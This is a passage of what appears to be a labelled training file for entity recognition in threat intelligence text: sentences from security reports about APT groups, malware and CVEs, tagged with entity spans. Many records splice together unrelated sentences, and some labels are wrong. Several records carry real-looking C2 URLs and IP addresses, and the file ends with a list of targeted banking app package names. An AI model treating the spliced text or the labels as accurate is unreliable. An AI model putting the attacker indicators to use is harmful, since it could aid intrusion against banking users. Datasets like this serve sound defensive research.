It now appears those attacks were perpetrated by Harrison , who sent emails from different accounts at the free email service Vistomail pretending to be Bradshaw , his then - girlfriend and their friends .", "spans": {"ORGANIZATION: DeepSight Managed Adversary and Threat Intelligence": [[112, 163]], "ORGANIZATION: MATI": [[166, 170]], "MALWARE: Backdoor.Powemuddy": [[206, 224]], "THREAT_ACTOR: Seedworm": [[243, 251]], "MALWARE: Powermud backdoor": [[255, 272]], "TOOL: POWERSTATS": [[279, 289]], "THREAT_ACTOR: group": [[326, 331], [402, 407]], "MALWARE: KHRAT": [[489, 494]], "THREAT_ACTOR: Harrison": [[595, 603]]}, "info": {"id": "cyberner_stix_train_005384", "source": "cyberner_stix_train"}} {"text": "The Sofacy group also leveraged the recent Lion Air disaster as a lure in one of these attacks , which continues to show a willingness to use current events in their social engineering themes .", "spans": {"THREAT_ACTOR: Sofacy": [[4, 10]]}, "info": {"id": "cyberner_stix_train_005385", "source": "cyberner_stix_train"}} {"text": "The app then continues to run in the background without the user ’ s knowledge . The initial indicator of the attack was a malicious web shell that was detected on an IIS server , coming out of the w3wp.exe process . An explanation could be the fact that the campaign was very limited nature , which does not arouse suspicion .", "spans": {"MALWARE: w3wp.exe": [[198, 206]]}, "info": {"id": "cyberner_stix_train_005386", "source": "cyberner_stix_train"}} {"text": "The TRITON malware contained the capability to communicate with Triconex SIS controllers . 
Documents with the flash exploit managed to evade static defenses and remain undetected as an exploit on VirusTotal .", "spans": {"TOOL: TRITON malware": [[4, 18]], "FILEPATH: Documents": [[91, 100]], "TOOL: flash": [[110, 115]], "VULNERABILITY: exploit": [[116, 123], [185, 192]], "TOOL: VirusTotal": [[196, 206]]}, "info": {"id": "cyberner_stix_train_005387", "source": "cyberner_stix_train"}} {"text": "Country selection The administration console screenshots also show the ability to filter the results by country . For example , PwC UK has observed APT10 compiling DLLs out of tools , such as Mimikatz and PwDump6 , and using legitimate , signed software , such as Windows Defender to load the malicious payloads . We were able to extract more than 600 unique MAC addresses from over 200 samples used in this attack . COSMICENERGY ’s capabilities and overall attack strategy appear reminiscent of the , which issued IEC-104 ON / OFF commands to interact with RTUs and , according to one , may have made use of an MSSQL server as a conduit system to access OT .", "spans": {"ORGANIZATION: PwC UK": [[128, 134]], "THREAT_ACTOR: APT10": [[148, 153]], "TOOL: Mimikatz": [[192, 200]], "TOOL: PwDump6": [[205, 212]], "TOOL: signed software": [[238, 253]], "MALWARE: COSMICENERGY ’s": [[417, 432]], "SYSTEM: MSSQL server": [[612, 624]]}, "info": {"id": "cyberner_stix_train_005388", "source": "cyberner_stix_train"}} {"text": "And , of course , remember to always be wary of unsolicited , unusual text messages and installing apps from third-party sources on your Android smartphone . In this instance , Symantec identified the specific PowerShell commands used by Gallmaker as being suspicious , leading to the discovery of this new campaign . 
After the modification , Akamai notes that they identified multiple compromised websites that had similarities .", "spans": {"SYSTEM: Android smartphone": [[137, 155]], "ORGANIZATION: Symantec": [[177, 185]], "TOOL: PowerShell commands": [[210, 229]], "THREAT_ACTOR: Gallmaker": [[238, 247]], "ORGANIZATION: Akamai": [[343, 349]]}, "info": {"id": "cyberner_stix_train_005389", "source": "cyberner_stix_train"}} {"text": "The short URL redirects to the application page at Google Play . In addition to focused targeting of the private sector with ties to Vietnam , APT32 has also targeted foreign governments , as well as Vietnamese dissidents and journalists since at least 2013 . However , numerous Ursnif variants were hosted on the bevendbrec.com site during this campaign . Now , consider a cyber threat detection system that takes a comprehensive and holistic approach to analyzing user behavior and computing interactions .", "spans": {"SYSTEM: Google Play": [[51, 62]], "THREAT_ACTOR: APT32": [[143, 148]], "ORGANIZATION: governments": [[175, 186]], "ORGANIZATION: dissidents": [[211, 221]], "ORGANIZATION: journalists": [[226, 237]], "MALWARE: Ursnif": [[279, 285]], "DOMAIN: bevendbrec.com": [[314, 328]]}, "info": {"id": "cyberner_stix_train_005390", "source": "cyberner_stix_train"}} {"text": "This sample , similar to other Trochilus samples , was deployed using a DLL sideloading method utilizing three files , uploaded to the same folder on the victim machine as identified in US-CERT advisory TA17-117A last revised on December 20 , 2018 . 
This powerful backdoor can receive commands from the attackers , enabling it to exfiltrate files from the system it is running on , execute additional scripts , delete files , and more .", "spans": {"MALWARE: sample": [[5, 11]], "MALWARE: Trochilus": [[31, 40]], "FILEPATH: backdoor": [[264, 272]]}, "info": {"id": "cyberner_stix_train_005391", "source": "cyberner_stix_train"}} {"text": "Other variations of parking point the IP address to Google 's recursive name server 8.8.8.8 , an address belonging to Confluence , or to other non-routable addresses .", "spans": {"ORGANIZATION: Google": [[52, 58]]}, "info": {"id": "cyberner_stix_train_005392", "source": "cyberner_stix_train"}} {"text": "This , in itself , does not prove that the perpetrators of the malware campaign are based in Russia , but it certainly sounds as if that is a strong possibility . The fact that Gallmaker appears to rely exclusively on LotL tactics and publicly available hack tools makes its activities extremely hard to detect . validating a block comparison variable , The goal of this type of threat is often to shame or embarrass .", "spans": {"THREAT_ACTOR: Gallmaker": [[177, 186]], "TOOL: LotL": [[218, 222]], "TOOL: publicly available hack tools": [[235, 264]]}, "info": {"id": "cyberner_stix_train_005393", "source": "cyberner_stix_train"}} {"text": "If the attack had succeeded , it would have given hackers control over the ATM network , while money mules would have been standing by the ATM machines at pre-set time intervals to cash them out . 
Our analysis shows that actors attempted to exploit CVE-2012-0158 to install NetTraveler Trojan .", "spans": {"THREAT_ACTOR: hackers": [[50, 57]], "VULNERABILITY: exploit": [[241, 248]], "VULNERABILITY: CVE-2012-0158": [[249, 262]], "MALWARE: NetTraveler Trojan": [[274, 292]]}, "info": {"id": "cyberner_stix_train_005394", "source": "cyberner_stix_train"}} {"text": "downloader , Newer version of SOURFACE , Sofacy .", "spans": {"MALWARE: SOURFACE": [[30, 38]], "MALWARE: Sofacy": [[41, 47]]}, "info": {"id": "cyberner_stix_train_005395", "source": "cyberner_stix_train"}} {"text": "In fact , AveMaria is a classic infostealer bot that collects all possible credentials from various types of software: browsers , email clients , messengers , etc , and can act as a keylogger . The documents attached to spear-phishing e-mails used in both attacks contain code that exploits CVE-2012-0158 , which despite its age remains one of the most common Microsoft Word vulnerabilities being exploited by multiple threat actors .", "spans": {"MALWARE: AveMaria": [[10, 18]], "FILEPATH: documents": [[198, 207]], "VULNERABILITY: CVE-2012-0158": [[291, 304]], "TOOL: Microsoft Word": [[360, 374]], "VULNERABILITY: vulnerabilities": [[375, 390]]}, "info": {"id": "cyberner_stix_train_005396", "source": "cyberner_stix_train"}} {"text": "Sometimes , they aim at establishing a foothold on the target 's computer to gain access into their organization , but , based on our data , this is usually not their main objective , as opposed to other Iranian threat groups , such as Oilrig1 and CopyKittens2 . 
The attackers actively sent out malicious documents and maintained several IP addresses for command and control .", "spans": {"THREAT_ACTOR: threat groups": [[212, 225]], "THREAT_ACTOR: Oilrig1": [[236, 243]], "THREAT_ACTOR: CopyKittens2": [[248, 260]]}, "info": {"id": "cyberner_stix_train_005397", "source": "cyberner_stix_train"}} {"text": "On the C2 panel , we found a potential link between Wolf Research and another Cyprus organization named Coralco Tech . LEAD and BARIUM are not known for large-scale spear-phishing , so it is unlikely that SOC personnel would have to deal with multiple machines having been compromised by these groups at the same time . The IXESHE attackers also used an exploit that affected Microsoft Excel — CVE-2009-3129 . The themed \" updates \" look very professional and are more up to date than its SocGholish counterpart .", "spans": {"ORGANIZATION: Wolf Research": [[52, 65]], "ORGANIZATION: Coralco Tech": [[104, 116]], "ORGANIZATION: SOC personnel": [[205, 218]], "THREAT_ACTOR: IXESHE": [[324, 330]], "ORGANIZATION: Microsoft": [[376, 385]], "TOOL: Excel": [[386, 391]], "VULNERABILITY: CVE-2009-3129": [[394, 407]], "MALWARE: SocGholish": [[489, 499]]}, "info": {"id": "cyberner_stix_train_005398", "source": "cyberner_stix_train"}} {"text": "While investigating a 2016 intrusion , Secureworks incident responders identified BRONZE BUTLER exploiting a then-unpatched remote code execution vulnerability ( CVE-2016-7836 ) in SKYSEA Client View , a popular Japanese product used to manage an organization . 
By relying on a native PDF command to navigate to a new URL , Zirconium successfully circumvented Chrome 's anti-redirect protection .", "spans": {"ORGANIZATION: Secureworks": [[39, 50]], "THREAT_ACTOR: BRONZE BUTLER": [[82, 95]], "VULNERABILITY: CVE-2016-7836": [[162, 175]]}, "info": {"id": "cyberner_stix_train_005399", "source": "cyberner_stix_train"}} {"text": "Windows Defender ATP is also capable of detecting previously unknown attacks by monitoring system behavior indicative of hostile activity , including :", "spans": {"TOOL: Windows Defender ATP": [[0, 20]]}, "info": {"id": "cyberner_stix_train_005400", "source": "cyberner_stix_train"}} {"text": "Group-IB has also detected recon emails sent out to New Zealand . We also identified another sample of ThreeDollars , created on January 15 , 2017 with the file name strategy preparation.dot .", "spans": {"ORGANIZATION: Group-IB": [[0, 8]], "MALWARE: recon emails": [[27, 39]], "MALWARE: ThreeDollars": [[103, 115]], "FILEPATH: preparation.dot": [[175, 190]]}, "info": {"id": "cyberner_stix_train_005401", "source": "cyberner_stix_train"}} {"text": "BRONZE PRESIDENT installs PlugX using DLL side-loading .", "spans": {"THREAT_ACTOR: BRONZE PRESIDENT": [[0, 16]], "MALWARE: PlugX": [[26, 31]], "TOOL: DLL": [[38, 41]]}, "info": {"id": "cyberner_stix_train_005402", "source": "cyberner_stix_train"}} {"text": "In addition to the look and feel of DroidVPN , this HenBox variant also contained a legitimate DroidVPN app within its APK package as an asset , which could be compared to a resource item within a Windows Portable Executable ( PE ) file . One government official puts it very matter-of-factly: Winnti is very specific to Germany . 
The new campaigns mark the first significant stirrings from the APT12 since it went silent in January in the wake of a detailed expose of the group and its exploits — and a retooling of what security researchers believe is a massive spying operation based in China .", "spans": {"MALWARE: HenBox": [[52, 58]], "SYSTEM: Windows Portable Executable": [[197, 224]], "THREAT_ACTOR: Winnti": [[294, 300]], "THREAT_ACTOR: APT12": [[395, 400]]}, "info": {"id": "cyberner_stix_train_005403", "source": "cyberner_stix_train"}} {"text": "The China Chopper actor activity starts with the download and execution of two exploit files which attempt to exploit the Windows vulnerabilities CVE-2015-0062 , CVE-2015-1701 and CVE-2016-0099 to allow the attacker to modify other objects on the server . As observed previously with CVE-2017-11882 and CVE-2018-0802 , the weaponizer was used exclusively by Chinese Cyber Espionage actors for approximately one year December 2017 through December 2018 , after which cybercrime actors began to incorporate it in their malicious activity .", "spans": {"MALWARE: China Chopper": [[4, 17]], "VULNERABILITY: CVE-2015-0062": [[146, 159]], "VULNERABILITY: CVE-2015-1701": [[162, 175]], "VULNERABILITY: CVE-2016-0099": [[180, 193]], "THREAT_ACTOR: attacker": [[207, 215]], "VULNERABILITY: CVE-2017-11882": [[284, 298]], "VULNERABILITY: CVE-2018-0802": [[303, 316]], "MALWARE: weaponizer": [[323, 333]], "THREAT_ACTOR: actors": [[382, 388]]}, "info": {"id": "cyberner_stix_train_005404", "source": "cyberner_stix_train"}} {"text": "] site , and mms4you [ . Using a U.S.-based C2 infrastructure ( see Figure 7 ) to compromise targets in the U.S. helps TG-3390 actors avoid geo-blocking and geo-flagging measures used in network defense . S-SHA2init . 
93ce211a71867017723cd78969aa4cac9d21c3d8f72c96ee3e1b2712c0eea494 For example , in its 2020 Internet Crime Report released in March , the FBI confirmed the total cost of attacks reported to the bureau in 2020 amounted to 29.1 million , an increase of more than 200 from the year before .", "spans": {"TOOL: U.S.-based C2 infrastructure": [[33, 61]], "THREAT_ACTOR: TG-3390": [[119, 126]], "FILEPATH: S-SHA2init": [[205, 215]], "ORGANIZATION: FBI": [[355, 358]]}, "info": {"id": "cyberner_stix_train_005405", "source": "cyberner_stix_train"}} {"text": "This ability is further demonstrated by analysis of interactions between TG-3390 operators and a target environment .", "spans": {"THREAT_ACTOR: TG-3390": [[73, 80]]}, "info": {"id": "cyberner_stix_train_005406", "source": "cyberner_stix_train"}} {"text": "The email stealer collects connection protocol information and account information , such as SMTP , IMAP , and POP3 , which are stored in the registry by Outlook and Thunderbird mail clients and sends them to the attacker server in a specific format . Kaspersky Lab has detected a new method of first infection that uses a drive-by-download with a flash exploit ( CVE-2015-5119 , the one leaked from The Hacking Team incident ) .", "spans": {"MALWARE: email stealer": [[4, 17]], "ORGANIZATION: Kaspersky Lab": [[252, 265]], "TOOL: flash": [[348, 353]], "VULNERABILITY: exploit": [[354, 361]], "VULNERABILITY: CVE-2015-5119": [[364, 377]]}, "info": {"id": "cyberner_stix_train_005407", "source": "cyberner_stix_train"}} {"text": "In July of 2015 , we identified a full e-mail uploaded to an antivirus scanning service that carried a Scarlet Mimic exploit document . 
However , in September last year , our friends at CSIS published a blog detailing a new Carbanak variant affecting one of its customers .", "spans": {"VULNERABILITY: Scarlet Mimic exploit": [[103, 124]], "ORGANIZATION: CSIS": [[186, 190]], "MALWARE: Carbanak": [[224, 232]], "ORGANIZATION: customers": [[262, 271]]}, "info": {"id": "cyberner_stix_train_005408", "source": "cyberner_stix_train"}} {"text": "At other times , Bread appears to abandon hope of making a variant successful and we see a gap of a week or longer before the next variant . BLACKGEAR is an espionage campaign which has targeted users in Taiwan for many years . The first 8 bytes of data are static . On June 27 , 2023 , at 18:51:57 UTC , Mandiant identified a malicious Ruby script executed via the JumpCloud agent at a downstream customer ( a software solutions entity ) .", "spans": {"MALWARE: Bread": [[17, 22]], "ORGANIZATION: users": [[195, 200]], "MALWARE: malicious Ruby script": [[327, 348]], "ORGANIZATION: JumpCloud agent": [[366, 381]], "ORGANIZATION: downstream customer": [[387, 406]], "ORGANIZATION: software solutions entity": [[411, 436]]}, "info": {"id": "cyberner_stix_train_005409", "source": "cyberner_stix_train"}} {"text": "Figure 1 describes this infection process and the main behaviors of RuMMS . NEODYMIUM is an activity group that , like PROMETHIUM , conducted an attack campaign in early May 2016 . 
Basic Information on the “ .dot ” file are provided : The ransom note also makes reference to 3AM", "spans": {"MALWARE: RuMMS": [[68, 73]], "THREAT_ACTOR: NEODYMIUM": [[76, 85]], "THREAT_ACTOR: activity group": [[92, 106]], "THREAT_ACTOR: PROMETHIUM": [[119, 129]], "FILEPATH: .dot": [[208, 212]], "MALWARE: 3AM": [[274, 277]]}, "info": {"id": "cyberner_stix_train_005410", "source": "cyberner_stix_train"}} {"text": "Figure 10 : The algorithm of the malicious update , while “ Agent Smith ” updates application If all that has failed , “ Agent Smith ” turns to Man-in-the-Disk vulnerability for ‘ SHAREit ’ or ‘ Xender ’ applications . The second , aptly titled \" kontrakt87.doc \" , copies a generic telecommunications service contract from MegaFon , a large Russian mobile phone operator . The decrypted data contains three executables . There are different installation flows for this campaign , but we will focus on the one that uses a URL shortcut .", "spans": {"MALWARE: Agent Smith": [[60, 71], [121, 132]], "VULNERABILITY: Man-in-the-Disk": [[144, 159]], "SYSTEM: SHAREit": [[180, 187]], "SYSTEM: Xender": [[195, 201]], "MALWARE: kontrakt87.doc": [[247, 261]], "ORGANIZATION: telecommunications service": [[283, 309]], "ORGANIZATION: MegaFon": [[324, 331]], "ORGANIZATION: mobile phone operator": [[350, 371]], "SYSTEM: a URL shortcut": [[520, 534]]}, "info": {"id": "cyberner_stix_train_005411", "source": "cyberner_stix_train"}} {"text": "Like Vcrodat , Nibatad is also a loader that leverages search order hijacking , and downloads an encrypted payload to the infected computer . 
The other overlapping files are tools used by the adversary to locate other systems on the network ( etool.exe ) , check to see if they are vulnerable to CVE-2017-0144 ( EternalBlue ) patched in MS07-010 ( checker1.exe ) and pivot to them using remote execution functionality offered by a tool similar to PsExec offered by Impacket ( psexec.exe ) .", "spans": {"TOOL: Vcrodat": [[5, 12]], "TOOL: Nibatad": [[15, 22]], "FILEPATH: etool.exe": [[243, 252]], "VULNERABILITY: CVE-2017-0144": [[296, 309]], "VULNERABILITY: EternalBlue": [[312, 323]], "FILEPATH: MS07-010": [[337, 345]], "FILEPATH: checker1.exe": [[348, 360]], "TOOL: PsExec": [[447, 453]], "TOOL: Impacket": [[465, 473]], "FILEPATH: psexec.exe": [[476, 486]]}, "info": {"id": "cyberner_stix_train_005412", "source": "cyberner_stix_train"}} {"text": "'' The latest samples attributed to this campaign were discovered by security researchers from ClearSky . Mandiant has observed APT29 using a stealthy backdoor that we call POSHSPY . The second payload , downloaded via the DownloadData method , is a Ursnif executable . Additional investigation will reveal more about the goals of Charming Kitten regarding the medical sector .", "spans": {"ORGANIZATION: ClearSky": [[95, 103]], "ORGANIZATION: Mandiant": [[106, 114]], "THREAT_ACTOR: APT29": [[128, 133]], "TOOL: POSHSPY": [[173, 180]], "TOOL: DownloadData": [[223, 235]], "MALWARE: Ursnif": [[250, 256]], "THREAT_ACTOR: Charming Kitten": [[331, 346]], "ORGANIZATION: medical sector": [[361, 375]]}, "info": {"id": "cyberner_stix_train_005413", "source": "cyberner_stix_train"}} {"text": "The information gathered from these engagements , combined with information from prior Dridex IR engagements , provides insight into how INDRIK SPIDER deploys and operates both Dridex and BitPaymer . 
We also discovered an interesting piece of rare malware created by this threat actor – a Bluetooth device harvester .", "spans": {"TOOL: Dridex IR": [[87, 96]], "THREAT_ACTOR: INDRIK SPIDER": [[137, 150]], "TOOL: Dridex": [[177, 183]], "TOOL: BitPaymer": [[188, 197]], "MALWARE: malware": [[248, 255]], "FILEPATH: Bluetooth device harvester": [[289, 315]]}, "info": {"id": "cyberner_stix_train_005414", "source": "cyberner_stix_train"}} {"text": "] 208 attiva.exodus.esurv [ . My understanding is FireEye labels entities where definitive attribution is not yet possible with the \" TEMP \" moniker ( hence , TEMP.Veles ) – yet in this case FireEye developed and deployed the label , then appeared to move away from it in subsequent reporting . in the Middle East since 2012 . But on Mar. 5 , 2014 , Harrison committed suicide by shooting himself in the head with a handgun .", "spans": {"ORGANIZATION: FireEye": [[50, 57], [191, 198]], "THREAT_ACTOR: TEMP.Veles": [[159, 169]], "ORGANIZATION: Harrison": [[350, 358]]}, "info": {"id": "cyberner_stix_train_005415", "source": "cyberner_stix_train"}} {"text": "The above code allows DealersChoice to load a second SWF object , specifically loading it with an argument that includes a C2 URL of “ http://ndpmedia24.com/0pq6m4f.m3u8 ” .", "spans": {"TOOL: DealersChoice": [[22, 35]], "TOOL: SWF": [[53, 56]], "TOOL: C2": [[123, 125]], "URL: http://ndpmedia24.com/0pq6m4f.m3u8": [[135, 169]]}, "info": {"id": "cyberner_stix_train_005416", "source": "cyberner_stix_train"}} {"text": "network.exe submitting to the server code snippet Code similarities We found some code similarities between the implant for Windows and other public accessible projects . By listing sub-folders , SWAnalytics is able to infer QQ accounts which have never been used on the device . 
Machete : El Machete .", "spans": {"SYSTEM: Windows": [[124, 131]], "MALWARE: SWAnalytics": [[196, 207]], "THREAT_ACTOR: Machete": [[280, 287]], "THREAT_ACTOR: El Machete": [[290, 300]]}, "info": {"id": "cyberner_stix_train_005417", "source": "cyberner_stix_train"}} {"text": "For example , it could be used to display unwanted and annoying advertisements on a device , or potentially , to download and deploy a payload that steals credentials from an infected device . The group 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat . In order to gain any further credentials , APT10 will usually deploy credential theft tools such as mimikatz or PwDump , sometimes using DLL load order hijacking , to use against a domain controller , explained further in Annex B .", "spans": {"THREAT_ACTOR: group": [[197, 202]], "ORGANIZATION: specific individuals": [[276, 296]], "VULNERABILITY: zero-day exploits": [[337, 354]], "THREAT_ACTOR: APT10": [[439, 444]], "MALWARE: mimikatz": [[496, 504]], "MALWARE: PwDump": [[508, 514]], "MALWARE: DLL load order hijacking": [[533, 557]]}, "info": {"id": "cyberner_stix_train_005418", "source": "cyberner_stix_train"}} {"text": "Most recently , the ransomware known as Ryuk came to market in August 2017 and has netted its operators , tracked by Falcon Intelligence as GRIM SPIDER , a significant ( and immediate ) profit in campaigns also targeting large organizations . 
Although Silence 's phishing emails were also sent to bank employees in Central and Western Europe , Africa , and Asia ) .", "spans": {"TOOL: ransomware": [[20, 30]], "TOOL: Ryuk": [[40, 44]], "ORGANIZATION: Falcon Intelligence": [[117, 136]], "THREAT_ACTOR: GRIM SPIDER": [[140, 151]], "TOOL: emails": [[272, 278]], "ORGANIZATION: bank employees": [[297, 311]]}, "info": {"id": "cyberner_stix_train_005419", "source": "cyberner_stix_train"}} {"text": "The message translates roughly to “ You got a photo in MMS format : hxxp : //yyyyyyyy.XXXX.ru/mms.apk. ” So far we identified seven different URLs being used to spread RuMMS in the wild . Attackers using several locations in China have leveraged C&C servers on purchased hosted services in the United States and compromised servers in the Netherlands to wage attacks against global oil , gas , and petrochemical companies , as well as individuals and executives in Kazakhstan , Taiwan , Greece , and the United States to acquire proprietary and highly confidential information . The fact that the “ 28847.exe ” file can be opened makes us understand that the “ 28847 ” file is another SFX file . 
LotLBin techniques also make it difficult for defenders to detect threat activity as they need to not only remain vigilant for new files introduced to their environments , but also for modifications to files already present within their installed OT applications and services .", "spans": {"MALWARE: RuMMS": [[168, 173]], "THREAT_ACTOR: Attackers": [[188, 197]], "ORGANIZATION: oil": [[382, 385]], "ORGANIZATION: gas": [[388, 391]], "ORGANIZATION: petrochemical companies": [[398, 421]], "ORGANIZATION: executives": [[451, 461]], "FILEPATH: 28847.exe": [[599, 608]], "FILEPATH: 28847": [[660, 665]], "TOOL: SFX": [[683, 686]], "THREAT_ACTOR: LotLBin techniques": [[693, 711]], "SYSTEM: OT applications": [[940, 955]]}, "info": {"id": "cyberner_stix_train_005420", "source": "cyberner_stix_train"}} {"text": "There was no activity from the group on weekends .", "spans": {}, "info": {"id": "cyberner_stix_train_005421", "source": "cyberner_stix_train"}} {"text": "FireEye network devices blocked infection attempts at over a dozen victims primarily in Germany , Japan , and the U.S until Oct. 24 at 15:00 UTC , when the infection attempts ceased and attacker infrastructure – both 1dnscontrol.com and the legitimate websites containing the rogue code – were taken offline . During a recent campaign , APT32 leveraged social engineering emails with Microsoft ActiveMime file attachments to deliver malicious macros .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "THREAT_ACTOR: attacker": [[186, 194]], "THREAT_ACTOR: APT32": [[337, 342]], "TOOL: emails": [[372, 378]], "FILEPATH: Microsoft ActiveMime file": [[384, 409]]}, "info": {"id": "cyberner_stix_train_005422", "source": "cyberner_stix_train"}} {"text": "[ True/False ] Signal strength Screen active [ True/False ] Orientation Was accessibility permission granted ? 
In this case , a small group reusing exploit code , some powershell-based malware and mostly social engineering has been able to steal sensitive documents and data from victims since at least November 2015 . In the first week of May 2016 , FireEye 's DTI identified a wave of emails containing malicious attachments being sent to multiple banks in the Middle East region .", "spans": {"THREAT_ACTOR: group": [[134, 139]], "TOOL: powershell-based malware": [[168, 192]], "ORGANIZATION: social engineering": [[204, 222]], "ORGANIZATION: FireEye 's DTI": [[351, 365]], "TOOL: emails": [[387, 393]], "FILEPATH: malicious attachments": [[405, 426]], "ORGANIZATION: banks": [[450, 455]]}, "info": {"id": "cyberner_stix_train_005423", "source": "cyberner_stix_train"}} {"text": "This question of perception and accuracy rests upon the underlying epistemic framework and the goal conceived for that framework in defining an adversary : FireEye ’s methodology follows a deductive approach requiring the collection of significant evidence over time to yield a conclusion that will be necessary given the premises ( the totality of evidence suggests APTxx ) ; the Dragos approach instead seeks an inductive approach , where premises may all be true but the conclusion need not necessarily follow from them given changes in premises over time or other observations not contained within the set ( thus , identified behaviors strongly suggests an activity group , defined as X ) .", "spans": {"ORGANIZATION: FireEye": [[156, 163]], "ORGANIZATION: Dragos": [[381, 387]]}, "info": {"id": "cyberner_stix_train_005424", "source": "cyberner_stix_train"}} {"text": "The module also reads the contents of the file “ %APPDATA%\\chkdbg.log ” and appends it to the results .", "spans": {"FILEPATH: %APPDATA%\\chkdbg.log": [[49, 69]]}, "info": {"id": "cyberner_stix_train_005425", "source": "cyberner_stix_train"}} {"text": "Latest version ( 2018 ) Let ’ s now return to the present day and a detailed description of the 
functionality of a current representative of the Rotexy family ( SHA256 : ba4beb97f5d4ba33162f769f43ec8e7d1ae501acdade792a4a577cd6449e1a84 ) . ChopShop1 is a new framework developed by the MITRE Corporation for network-based protocol decoders that enable security professionals to understand actual commands issued by human operators controlling endpoints . In May 2017 , SecureWorks® Counter Threat Unit® ( CTU ) researchers investigated a widespread and opportunistic WCry ( also known as WanaCry , WanaCrypt , and Wana Decrypt0r ) ransomware campaign that impacted many systems around the world .", "spans": {"MALWARE: Rotexy": [[145, 151]], "MALWARE: ChopShop1": [[239, 248]], "ORGANIZATION: MITRE Corporation": [[285, 302]], "ORGANIZATION: SecureWorks® Counter Threat Unit®": [[468, 501]], "ORGANIZATION: CTU": [[504, 507]], "MALWARE: WCry": [[566, 570]], "MALWARE: WanaCry": [[587, 594]], "MALWARE: WanaCrypt": [[597, 606]], "MALWARE: Wana Decrypt0r": [[613, 627]]}, "info": {"id": "cyberner_stix_train_005426", "source": "cyberner_stix_train"}} {"text": "Each value represents a different type of data to steal from the device : Value Data Type 1 Accounts 2 Installed APP list 3 Running processes list 4 Battery status 5 Browser bookmarks and histories 6 Call logs 7 Clipboard 8 Contacts 9 Mobile operator information a File list on SD card b Location c Image list d Audio list e Video list f Storage and memory information g Connection information h Sensors information i SMS messages j VCard format contacts Table 1 . Afterwards , the installer malware creates a downloader and a configuration file from its resource and executes it . This module mainly relies on WMI and Windows objects to deliver results , which will be sent back to the operators . 
There are a few reasons why attackers may opt to pay for an as - a - service malware tool for their chosen campaign : • As - a - service saves attackers time .", "spans": {"TOOL: WMI": [[611, 614]], "SYSTEM: Windows": [[619, 626]], "THREAT_ACTOR: attackers": [[727, 736]], "TOOL: an as - a - service malware tool": [[756, 788]]}, "info": {"id": "cyberner_stix_train_005427", "source": "cyberner_stix_train"}} {"text": "Suckfly targeted one of India ’s largest e-commerce companies , a major Indian shipping company , one of India ’s largest financial organizations , and an IT firm that provides support for India ’s largest stock exchange .", "spans": {"THREAT_ACTOR: Suckfly": [[0, 7]]}, "info": {"id": "cyberner_stix_train_005428", "source": "cyberner_stix_train"}} {"text": "http://109.248.148.42/office/thememl/2012/main/attachedTemplate.dotm http://109.248.148.42/officeDocument/2006/relationships/templates.dotm .", "spans": {"URL: http://109.248.148.42/office/thememl/2012/main/attachedTemplate.dotm": [[0, 68]], "URL: http://109.248.148.42/officeDocument/2006/relationships/templates.dotm": [[69, 139]]}, "info": {"id": "cyberner_stix_train_005429", "source": "cyberner_stix_train"}} {"text": "Details of the first wave , including a thorough technical analysis of CloudDuke , was published by Palo Alto Networks on 14th July .", "spans": {"MALWARE: CloudDuke": [[71, 80]], "ORGANIZATION: Palo Alto Networks": [[100, 118]]}, "info": {"id": "cyberner_stix_train_005430", "source": "cyberner_stix_train"}} {"text": "Moreover , incoming traffic from the C & C server began to use gzip compression , and the top-level domain for all C & Cs was .com : Since December 2016 , the changes in C & C communication methods have affected only how the relative path in the URL is generated : the pronounceable word was replaced by a rather long random combination of letters and numbers , for example , “ ozvi4malen7dwdh ” or “ f29u8oi77024clufhw1u5ws62 ” . 
The SWC of a Uyghur cultural website suggests intent to target the Uyghur ethnic group , a Muslim minority group primarily found in the Xinjiang region of China . The attackers could hide their activities if they noted the business hours of the intended targets and performed the actions coinciding with said times . Ashley Madison ’s long - suspected army of fake female accounts came to the fore in August 2012 after the former sex worker turned activist and blogger Maggie McNeill published screenshots apparently taken from Ashley Madison ’s internal systems suggesting that a large percentage of the female accounts on the service were computer - operated bots .", "spans": {"TOOL: SWC": [[435, 438]], "ORGANIZATION: Uyghur ethnic group": [[498, 517]], "ORGANIZATION: Muslim minority group": [[522, 543]], "ORGANIZATION: Ashley Madison": [[748, 762]], "ORGANIZATION: Maggie McNeill": [[900, 914]], "SYSTEM: Ashley Madison ’s internal systems": [[959, 993]], "ORGANIZATION: female accounts": [[1036, 1051]]}, "info": {"id": "cyberner_stix_train_005431", "source": "cyberner_stix_train"}} {"text": "We will continue to observe the group ’s activities as they target industries from the United States and Europe .", "spans": {}, "info": {"id": "cyberner_stix_train_005432", "source": "cyberner_stix_train"}} {"text": "As mentioned in the Hermes to Ryuk section , Ryuk uses a combination of symmetric ( AES ) and asymmetric ( RSA ) encryption to encrypt files . 
Attackers like to use spear-fishing email with password protected RAR attachment to avoid being detected by the email gateACT .", "spans": {"TOOL: Hermes": [[20, 26]], "TOOL: Ryuk": [[30, 34], [45, 49]], "TOOL: AES": [[84, 87]], "TOOL: RSA": [[107, 110]], "MALWARE: RAR": [[209, 212]]}, "info": {"id": "cyberner_stix_train_005433", "source": "cyberner_stix_train"}} {"text": "We ’ ve documented several interesting attacks ( A Gift for Dalai Lamas Birthday and Cyber Attacks Against Uyghur Mac OS X Users Intensify ) which used ZIP files as well as DOC , XLS and PDF documents rigged with exploits . POWRUNER was delivered using a malicious RTF file that exploited CVE-2017-0199 . The attackers appeared to be Chinese-speaking and targeted mainly top-level government agencies and civil and military organizations in countries such as the Philippines , Malaysia , Cambodia , Indonesia , Vietnam , Myanmar , Singapore , Nepal , Thailand , Laos and China .", "spans": {"SYSTEM: Mac OS X": [[114, 122]], "TOOL: POWRUNER": [[224, 232]], "MALWARE: RTF file": [[265, 273]], "VULNERABILITY: CVE-2017-0199": [[289, 302]], "THREAT_ACTOR: attackers": [[309, 318]], "ORGANIZATION: government agencies": [[381, 400]], "ORGANIZATION: civil and military organizations": [[405, 437]]}, "info": {"id": "cyberner_stix_train_005434", "source": "cyberner_stix_train"}} {"text": "COZY BEAR ’s preferred intrusion method is a broadly targeted spearphish campaign that typically includes web links to a malicious dropper .", "spans": {"THREAT_ACTOR: COZY BEAR": [[0, 9]]}, "info": {"id": "cyberner_stix_train_005435", "source": "cyberner_stix_train"}} {"text": "com.bbt.cmol com.sovereign.santander com.mtb.mbanking.sc.retail.prod com.fi9293.godough com.commbank.netbank org.westpac.bank org.stgeorge.bank au.com.nab.mobile au.com.bankwest.mobile au.com.ingdirect.android org.banksa.bank com.anz.android com.anz.android.gomoney com.citibank.mobile.au org.bom.bank com.latuabancaperandroid 